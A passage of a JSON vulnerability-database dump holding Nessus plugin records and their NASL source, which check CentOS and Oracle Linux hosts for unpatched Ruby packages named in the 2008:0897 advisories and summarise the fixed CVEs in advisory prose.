script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-mode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-rdoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-ri\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/12/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 4.x / 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", reference:\"irb-1.8.1-7.el4_7.2\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"ruby-1.8.1-7.el4_7.2\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"ruby-devel-1.8.1-7.el4_7.2\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"ruby-docs-1.8.1-7.el4_7.2\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"ruby-libs-1.8.1-7.el4_7.2\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"ruby-mode-1.8.1-7.el4_7.2\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"ruby-tcltk-1.8.1-7.el4_7.2\")) flag++;\n\nif (rpm_check(release:\"CentOS-5\", reference:\"ruby-1.8.5-5.el5_2.6\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"ruby-devel-1.8.5-5.el5_2.6\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"ruby-docs-1.8.5-5.el5_2.6\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"ruby-irb-1.8.5-5.el5_2.6\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"ruby-libs-1.8.5-5.el5_2.6\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"ruby-mode-1.8.5-5.el5_2.6\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"ruby-rdoc-1.8.5-5.el5_2.6\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"ruby-ri-1.8.5-5.el5_2.6\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"ruby-tcltk-1.8.5-5.el5_2.6\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"irb / ruby / ruby-devel / ruby-docs / ruby-irb / ruby-libs / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T12:44:14", "description": "From Red Hat Security Advisory 2008:0897 :\n\nUpdated ruby packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. (CVE-2008-3905)\n\nRuby's XML document parsing module (REXML) was prone to a denial of\nservice attack via XML documents with large XML entity definitions\nrecursion. A specially crafted XML file could cause a Ruby application\nusing the REXML module to use an excessive amount of CPU and memory.\n(CVE-2008-3790)\n\nAn insufficient 'taintness' check flaw was discovered in Ruby's DL\nmodule, which provides direct access to the C language functions. An\nattacker could use this flaw to bypass intended safe-level\nrestrictions by calling external C functions with the arguments from\nan untrusted tainted inputs. (CVE-2008-3657)\n\nA denial of service flaw was discovered in WEBrick, Ruby's HTTP server\ntoolkit. A remote attacker could send a specially crafted HTTP request\nto a WEBrick server that would cause the server to use an excessive\namount of CPU time. (CVE-2008-3656)\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression\nengine. If a Ruby script tried to process a large amount of data via a\nregular expression, it could cause Ruby to enter an infinite-loop and\ncrash. (CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.", "edition": 25, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 4 / 5 : ruby (ELSA-2008-0897)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2008-3443", "CVE-2008-4310", "CVE-2008-1145", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:irb", "p-cpe:/a:oracle:linux:ruby-irb", "p-cpe:/a:oracle:linux:ruby-ri", "p-cpe:/a:oracle:linux:ruby-devel", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:ruby", "p-cpe:/a:oracle:linux:ruby-docs", "cpe:/o:oracle:linux:4", "p-cpe:/a:oracle:linux:ruby-tcltk", "p-cpe:/a:oracle:linux:ruby-libs", "p-cpe:/a:oracle:linux:ruby-rdoc", "p-cpe:/a:oracle:linux:ruby-mode"], "id": "ORACLELINUX_ELSA-2008-0897.NASL", "href": "https://www.tenable.com/plugins/nessus/67752", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2008:0897 and \n# Oracle Linux Security Advisory ELSA-2008-0897 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67752);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1145\", \"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\", \"CVE-2008-4310\");\n script_bugtraq_id(30644, 30682, 31699);\n script_xref(name:\"RHSA\", value:\"2008:0897\");\n\n script_name(english:\"Oracle Linux 4 / 5 : ruby (ELSA-2008-0897)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2008:0897 :\n\nUpdated ruby packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. (CVE-2008-3905)\n\nRuby's XML document parsing module (REXML) was prone to a denial of\nservice attack via XML documents with large XML entity definitions\nrecursion. A specially crafted XML file could cause a Ruby application\nusing the REXML module to use an excessive amount of CPU and memory.\n(CVE-2008-3790)\n\nAn insufficient 'taintness' check flaw was discovered in Ruby's DL\nmodule, which provides direct access to the C language functions. An\nattacker could use this flaw to bypass intended safe-level\nrestrictions by calling external C functions with the arguments from\nan untrusted tainted inputs. (CVE-2008-3657)\n\nA denial of service flaw was discovered in WEBrick, Ruby's HTTP server\ntoolkit. A remote attacker could send a specially crafted HTTP request\nto a WEBrick server that would cause the server to use an excessive\namount of CPU time. (CVE-2008-3656)\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression\nengine. If a Ruby script tried to process a large amount of data via a\nregular expression, it could cause Ruby to enter an infinite-loop and\ncrash. (CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-October/000767.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-October/000769.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 22, 264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-mode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-rdoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-ri\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/03/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4 / 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"irb-1.8.1-7.0.1.el4_7.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"ruby-1.8.1-7.0.1.el4_7.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"ruby-devel-1.8.1-7.0.1.el4_7.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"ruby-docs-1.8.1-7.0.1.el4_7.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"ruby-libs-1.8.1-7.0.1.el4_7.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"ruby-mode-1.8.1-7.0.1.el4_7.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"ruby-tcltk-1.8.1-7.0.1.el4_7.1\")) flag++;\n\nif (rpm_check(release:\"EL5\", reference:\"ruby-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ruby-devel-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ruby-docs-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ruby-irb-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ruby-libs-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ruby-mode-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ruby-rdoc-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ruby-ri-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ruby-tcltk-1.8.5-5.el5_2.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"irb / ruby / ruby-devel / ruby-docs / ruby-irb / ruby-libs / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-06T09:25:24", "description": "Updated ruby packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. (CVE-2008-3905)\n\nRuby's XML document parsing module (REXML) was prone to a denial of\nservice attack via XML documents with large XML entity definitions\nrecursion. A specially crafted XML file could cause a Ruby application\nusing the REXML module to use an excessive amount of CPU and memory.\n(CVE-2008-3790)\n\nAn insufficient 'taintness' check flaw was discovered in Ruby's DL\nmodule, which provides direct access to the C language functions. An\nattacker could use this flaw to bypass intended safe-level\nrestrictions by calling external C functions with the arguments from\nan untrusted tainted inputs. (CVE-2008-3657)\n\nA denial of service flaw was discovered in WEBrick, Ruby's HTTP server\ntoolkit. A remote attacker could send a specially crafted HTTP request\nto a WEBrick server that would cause the server to use an excessive\namount of CPU time. (CVE-2008-3656)\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression\nengine. If a Ruby script tried to process a large amount of data via a\nregular expression, it could cause Ruby to enter an infinite-loop and\ncrash. (CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.", "edition": 27, "published": "2008-10-28T00:00:00", "title": "CentOS 4 / 5 : ruby (CESA-2008:0897)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2008-3443", "CVE-2008-4310", "CVE-2008-1145", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "modified": "2008-10-28T00:00:00", "cpe": ["p-cpe:/a:centos:centos:ruby-tcltk", "p-cpe:/a:centos:centos:ruby", "p-cpe:/a:centos:centos:ruby-rdoc", "p-cpe:/a:centos:centos:ruby-libs", "cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:ruby-mode", "p-cpe:/a:centos:centos:ruby-docs", "p-cpe:/a:centos:centos:ruby-devel", "p-cpe:/a:centos:centos:irb", "p-cpe:/a:centos:centos:ruby-ri", "p-cpe:/a:centos:centos:ruby-irb", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2008-0897.NASL", "href": "https://www.tenable.com/plugins/nessus/34502", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0897 and \n# CentOS Errata and Security Advisory 2008:0897 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34502);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-1145\", \"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\", \"CVE-2008-4310\");\n script_bugtraq_id(30644, 30682, 31699);\n script_xref(name:\"RHSA\", value:\"2008:0897\");\n\n script_name(english:\"CentOS 4 / 5 : ruby (CESA-2008:0897)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated ruby packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. (CVE-2008-3905)\n\nRuby's XML document parsing module (REXML) was prone to a denial of\nservice attack via XML documents with large XML entity definitions\nrecursion. A specially crafted XML file could cause a Ruby application\nusing the REXML module to use an excessive amount of CPU and memory.\n(CVE-2008-3790)\n\nAn insufficient 'taintness' check flaw was discovered in Ruby's DL\nmodule, which provides direct access to the C language functions. An\nattacker could use this flaw to bypass intended safe-level\nrestrictions by calling external C functions with the arguments from\nan untrusted tainted inputs. (CVE-2008-3657)\n\nA denial of service flaw was discovered in WEBrick, Ruby's HTTP server\ntoolkit. A remote attacker could send a specially crafted HTTP request\nto a WEBrick server that would cause the server to use an excessive\namount of CPU time. (CVE-2008-3656)\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression\nengine. If a Ruby script tried to process a large amount of data via a\nregular expression, it could cause Ruby to enter an infinite-loop and\ncrash. (CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-October/015340.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7f33f148\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-October/015341.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cd91bfb9\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-October/015345.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?44810b1b\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-October/015354.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?984199a2\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-October/015355.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7677ed58\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 22, 264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-mode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-rdoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-ri\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ruby-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/03/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 4.x / 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", reference:\"irb-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"ruby-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"ruby-devel-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"ruby-docs-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"ruby-libs-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"ruby-mode-1.8.1-7.el4_7.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"ruby-tcltk-1.8.1-7.el4_7.1\")) flag++;\n\nif (rpm_check(release:\"CentOS-5\", reference:\"ruby-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"ruby-devel-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"ruby-docs-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"ruby-irb-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"ruby-libs-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"ruby-mode-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"ruby-rdoc-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"ruby-ri-1.8.5-5.el5_2.5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"ruby-tcltk-1.8.5-5.el5_2.5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"irb / ruby / ruby-devel / ruby-docs / ruby-irb / ruby-libs / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T13:06:18", "description": "Updated ruby packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. (CVE-2008-3905)\n\nRuby's XML document parsing module (REXML) was prone to a denial of\nservice attack via XML documents with large XML entity definitions\nrecursion. A specially crafted XML file could cause a Ruby application\nusing the REXML module to use an excessive amount of CPU and 